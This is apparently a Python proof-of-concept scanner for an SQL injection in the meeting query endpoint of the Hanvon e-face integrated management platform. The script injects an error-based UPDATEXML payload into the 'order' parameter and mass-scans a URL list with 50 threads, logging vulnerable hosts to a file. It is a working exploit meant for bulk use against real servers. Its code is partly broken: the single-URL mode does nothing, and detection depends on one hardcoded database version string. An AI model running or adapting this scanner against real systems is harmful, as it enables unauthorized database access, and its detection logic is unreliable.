import argparse,sys,requests,json
from multiprocessing.dummy import Pool
def poc(target):
    payload="/manage/meeting/queryMeeting.do?recoToken=67mds2pxXQb&page=1&pageSize=10&columnKey=&order=(UPDATEXML(2920,CONCAT(0x7e,@@version,0x7e,(SELECT+(ELT(123=123,1)))),8357))&state=2"
    headres={
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",
        "Accept": "*/*",
        "Connection": "Keep-Alive"
    }
    try:
        res1=requests.get(url=target,headers=headres)
        if res1.status_code == 200:
            res2=requests.get(url=target+payload,headers=headres)
            if '~5.7.16~1' in res2.text:
                print(f"[+]{target}存在sql漏洞")
                with open('result1.txt','a',encoding='utf-8') as fp:
                    fp.write(target+'\n')
            else:
                print(f"[-]该{target}不存在sql漏洞")
        else:
            print(f"[*]该{target}存在问题,请手工测试")        
    except:
        pass
def main():
    
    parser=argparse.ArgumentParser(description="汉王e脸通综合管理平台 Meeting 存在SQL注入漏洞")
    
    parser.add_argument('-u','--url',dest='url',type=str,help='place input lik')
    parser.add_argument('-f','--file',dest='file',type=str,help='place input your le path')
    
    args=parser.parse_args()
    
    if args.url and not args.file:
        print(args.url)
    if args.file and not args.url:
        url_list=[]
        with open(args.file,'r',encoding='utf-8')as fp:
            for i in fp.readlines():
                url_list.append(i.strip())
        mp=Pool(50)
        mp.map(poc,url_list)
        mp.close
        mp.join
    else:
        print(f"Usage: python{sys.argv[0]} -h")
if __name__=='__main__':
    main()
